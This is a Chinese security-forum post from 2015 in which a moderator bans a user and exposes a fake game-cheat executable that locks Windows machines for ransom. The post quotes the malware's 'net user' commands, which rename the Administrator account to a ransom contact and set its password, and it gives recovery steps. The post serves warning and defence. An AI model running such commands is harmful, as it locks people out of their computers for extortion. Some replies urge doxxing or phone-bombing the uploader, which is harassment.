吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

BanID:18234458832【发布恶意锁机程序】

Chief 发表于 2015-8-7 13:09
BanID:18234458832【发布恶意锁机程序】

此人发布的一个名为"CF-稳定不封号透视自瞄.exe"的程序

程序行为:
创建进程
%system%\net.exe
%system%\net1.exe
设置用户名  
net user Administrator /fullname:"解锁联系QQ1069130151"
设置密码
net1 user Administrator 771828497
重启系统

此程序设置的密码为:771828497
进入系统后取消掉密码即可

现在这类程序频繁出现,多数采用一机一码(在论坛看到不下3次了)
对于被这类恶意程序设置密码后的应对方法就是进PE清除密码
如何在u启动win PE系统中清除开机登入密码
http://jingyan.baidu.com/article/4853e1e5169a091909f72691.html

后记:
对于这类程序现在在网络上频繁出现,虽然清除密码不是很难,但是还是建议各位吾爱会员们,运行程序前多注意下,可用360隔离沙箱隔离运行看看,或者沙盘下运行。

想对那些涂怀不轨的*渣说,你在吾爱破解这样的技术论坛玩这种小伎俩,这里都是活跃在互联网安全界的精英,这点小动作就是找死,奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!

最后感谢大家一直以来对吾爱破解论坛的支持和维护,论坛安全离不开大家监督,任何违法违规的行为都逃不过大家的眼睛和管理的审查,对待此类*渣论坛绝不手软,坚决处罚到底!

免费评分

不二丶 + 1 + 1 谢谢@Thanks!
吾永不放弃 + 1 + 1 谢谢@Thanks!
leng_yu + 1 + 1 我很赞同!
CrestKing + 1 + 1 我很赞同!
吾爱3.1415 + 1 我很赞同!
酒加糖 + 1 我很赞同!
AmIzero + 1 我很赞同!
牛魔王0574 + 1 我很赞同!
riwfhiu + 1 谢谢@Thanks!
放肆的暧昧 + 1 已答复!
liyun + 1 我很赞同!
2016年入百万 + 1 我很赞同!
engineert + 1 我很赞同!
吾爱破解1990 + 1 热心回复!
jxg1986j + 1 用心讨论,共获提升!
357216926 + 1 我很赞同!
y000168 + 1 我很赞同!
珍惜ID + 1 这样的垃圾就是不能让它存在!支持
chioz + 1 我很赞同!
tao849476012 + 1 我很赞同!
小宽 + 1 谢谢@Thanks!
yyshun + 1 吾爱破解论坛有你更精彩!
WA187187 + 1 我很赞同!
UDI + 1 我很赞同!
Daemon + 1 !做的好!
wnan2008 + 1 班门弄斧 哈哈
121890575 + 1 我很赞同!
LXL90 + 1 我很赞同!
飔雨 + 1 我很赞同!
钱多多丶 + 1 这样的人拉出来斩了~
摆ll渡 + 1 热心回复!
蓝洛水深 + 1 很欣慰52pojie不像一些“高手”论坛,只会.
大米粥 + 1 谢谢@Thanks!
yzh2004 + 1 谢谢@Thanks!
激动的石榴 + 1 我很赞同!
Usdin + 1 --------
1195265362 + 1 支持楼主!
He_Sumver + 1 知道他qq大家知道怎么做了吧
Facksxx + 1 热心回复!
iCuttle + 1 感谢楼主及时发此贴,看论坛还有不少中招的.
6e6e6e6 + 1 干得漂亮
195995990 + 1 我很赞同!
ellisluk + 1 要严肃处理!!
madao + 1 论坛禁止点将!
一时颓废 + 1 前排出售瓜子 爆米花
神马皆是浮云 + 1 作死,
hdgalaxy + 1 爱死你了,偶像!
HI光头强 + 1 我很赞同!
a532656588 + 1 关公门前耍大刀 也是醉了!~~
白吱声 + 1 我很赞同!
Cherish、 + 1 我很赞同!
星期二zzz + 1 我很赞同!
过儿爱龙儿 + 1 我很赞同!
dgo521 + 1 我很赞同!
sd12059362 + 1 谢谢@Thanks!
Galaxy + 1 干得漂亮!
635419450 + 1 点个赞
xsj7828 + 1 可以说你的签名很猥亵吗
shwu1984 + 1 关羽面前耍大刀,找死啊!
xyy0822 + 1 炸他手机号1!!
9464614 + 1 我很赞同!
52老牛 + 1 我很赞同!
归隐人士 + 1 我很赞同!
wang80120 + 1 我很赞同!
夏沫梦影 + 1 谢谢@Thanks!
ShimakazeOwO + 1 我很赞同!
hyiok123 + 1 已答复!
奔跑吧 + 1 我很赞同!
Vincent_HE + 1 我很赞同!
忘记了1 + 1 热心回复!
冰魂 + 1 已答复!
劫局丶 + 1 我很赞同!
sl3318 + 1 谢谢@Thanks!
张子轩 + 1 大神把密码亮出来了,哈哈
吾爱吾爱网 + 1 我很赞同!
736110667 + 1 我很赞同!
x89988 + 1 我很赞同!
只对你有感觉 + 1 我很赞同!
淡水薄荷 + 1 谢谢@Thanks!
卖蛋的农村娃 + 1 鼓励转贴优秀软件安全工具和文档!
tzxinqing + 1 我很赞同!
代号沉没 + 1 我很赞同!
祈祷灬烦恼 + 1 我很赞同!
中兴壹号 + 1 我很赞同!
txt + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩.
iijjwq + 1 谢谢@Thanks!
龙腾飞2016 + 1 热心回复!
HuoYin88 + 1 我很赞同!
tangdragon + 1 我很赞同!
uj1144 + 1 做的好,就是要这样
hyyfsj + 1 谢谢@Thanks!
zsf1993 + 1 祝52越来越好
534449552 + 1 干得漂亮!
心飞扬520 + 1 谢谢@Thanks!
abc616898913 + 1 我给他打电话了!确定他的昵称就是他的手机.
隐尘 + 1 谢谢@Thanks!
纷飞雨雪 + 1 我很赞同!
1981287528 + 1 这么低级猥琐的软件怎么能出现在吾爱上
WGD61U + 1 我很赞同!
lxwabcdef + 1 我很赞同!

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Avenshy 发表于 2015-8-7 13:17
强烈鄙视这种人
不敢我有PE 欢迎上密码
流浪男 发表于 2015-11-16 13:14
我很少回帖   这一次我给个赞   是得提点心啊    最后一句   你M的最帅的人是hmily  你丫的敢不敢再自恋点
嘉靖 发表于 2015-8-7 13:20
不作死就不会死

免费评分

root1605 + 1 请勿灌水,提高回帖质量是每位会员应尽的义.

esotao 发表于 2015-8-7 13:21
感谢大神分享
Fighting。青春 发表于 2015-8-7 13:23
对于这种人,人肉了他都不解恨。竟敢在52里面发这种渣渣软件,真是狗胆包天。
waxm7524466 发表于 2015-8-7 13:24
人渣。。。
790544312 发表于 2015-8-7 13:31
这些黑客什么鬼

免费评分

root1605 + 1 论坛禁止点将!

gys168 发表于 2015-8-7 13:32
坚决支持  打击一切不良居心者

免费评分

root1605 + 1 此为违规行为,请遵守论坛相关规则!

爱学习的新手 发表于 2015-8-7 13:42 来自手机
esotao 发表于 2015-8-7 13:21
感谢大神分享

他这样又得不到好处
吾掌三界 发表于 2015-8-7 13:51
简直就是可以算是欺诈,太过分了,干得好